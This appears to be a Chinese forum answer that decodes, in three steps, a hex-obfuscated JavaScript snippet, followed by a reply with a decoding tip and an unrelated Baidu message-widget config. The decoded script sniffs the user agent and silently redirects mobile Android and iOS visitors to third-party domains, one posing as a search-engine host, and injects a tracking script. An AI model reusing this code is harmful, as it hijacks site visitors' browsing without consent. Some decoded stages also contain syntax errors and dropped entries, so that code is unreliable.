JavaScript解密

JavaScript011

JavaScript解密,第1张

第一步解码:

var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"]

var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"]src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2]

var b = {

    versions: function() {

        var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],

        d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]

        return {

            trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) > -0x1,

            presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) > -0x1,

            webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) > -0x1,

            gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) > -0x1 && c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,

            mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),

            ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^]+( U)? CPU.+Mac OS X/),

            android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) > -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) > -0x1,

            iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) > -0x1,

            iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) > -0x1,

            webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1

        }

    } (),

    language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()

}

if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {

    window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src

} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {

    window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]

}

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16])

第二步解码:

var _$ = ["wf", "?", "&t=zr", 'Trident', 'presto', 'AppleWebkit', 'Gecko', 'kHTML', 'Android', 'Linux', 'iphone', 'ipad', 'Safari', '&tid=15', "<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>"

]

var a = window["document"]["getElementById"](_$[0])["src"]src = a["split"](_$[1])[0x1] + _$[2]

var b = {

    versions: function() {

        var c = navigator["userAgent"],

        d = navigator["appVersion"]

        return {

            trident: c["indexOf"](_$[3]) > -0x1,

            presto: c["indexOf"](_$[4]) > -0x1,

            webKit: c["indexOf"](_$[5]) > -0x1,

            gecko: c["indexOf"](_$[6]) > -0x1 && c["indexOf"](_$[7]) == -0x1,

            mobile: !!c["match"](/AppleWebKit.*Mobile.*/),

            ios: !!c["match"](/\(i[^]+( U)? CPU.+Mac OS X/),

            android: c["indexOf"](_$[8]) > -0x1 || c["indexOf"](_$[9]) > -0x1,

            iPhone: c["indexOf"](_$[10]) > -0x1,

            iPad: c["indexOf"](_$[11]) > -0x1,

            webApp: c["indexOf"](_$[12]) == -0x1

        }

    } (),

    language: (navigator["browserLanguage"] || navigator["language"])["toLower\x43ase"]()

}

if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {

    window["location"]["href"] = _$[13] + src

} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {

    window["location"]["href"] = _$[14] + src + _$[15]

}

window["document"]["writeln"](_$[16])

第三步解码

var a = document.getElementById('wf').src

src = a.split('?')[1] + '&t=zr'

var b = {

    versions: function() {

        var c = navigator.userAgent,

        d = navigator.appVersion

        return {

            trident: c.indexOf('Trident') > -1,

            presto: c.indexOf( 'presto') > -1,

            webKit: c.indexOf('AppleWebkit') > -1,

            gecko: c.indexOf('Gecko') > -1 && c.indexOf('kHTML') == -1,

            mobile: !!c.match.(/AppleWebKit.*Mobile.*/),

            ios: !!c.match(/\(i[^]+( U)? CPU.+Mac OS X/),

            android: c.indexOf('Android') > -1 || c.indexOf('Linux') > -1,

            iPhone: c.indexOf('iphone') > -1,

            iPad: c.indexOf('ipad') > -1,

            webApp: c.indexOf('Safari') == -1

        }

    } (),

    language: (navigator.browserLanguage || navigator.language).toLowerCase()

}

if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {

    location.href =  'http://baidu-google-sogou-soso-360-qq.mahjun.com/cdn/index.html?' + src

} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {

    location.href  =  'http://ios.adanzhuo.com/go3.php?' + src + '&tid=15'

}

document.writeln('<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>')

这个只是一个汉字的unicode编码.

告诉楼主一个简单的方法.把上面的代码放入UltraEdit中,把"\"替换为"%",然后去http://tools88.com/safe/Unicode.php 解码,复制代码.解密.

最后附上我解密后的代码

var owner = "2278749"var sf_mess_cfg = {theme:"classic",color:"blue",title:"欢迎给我们留言",send:"发送",copyright:"百度提供技术支持",mbpos:"RD"}var sf_mess_msg = {emailErr: '请填写正确的Email',messErr: '您的留言字数已超过限制,请保留在1000个字以内。',prefix: '请填写',success: '我们已经收到您的留言,稍候会与您联系.谢谢!',fail: '您的留言发送失败,请重试。'}var sf_mess_cols = [{type:"textarea",mbtype: "message",tip: "留言内容",innertip: "请在此留言,我们会及时联系您",idname: "content"},{type:"text",mbtype: "tel",tip: "手机号码",innertip: "请输入您的手机号码",idname: "phone"}]document.write('<script src="http://myshifen.baidu.com/sfmess/scripts/entry.js" type="text/javascript"></script>')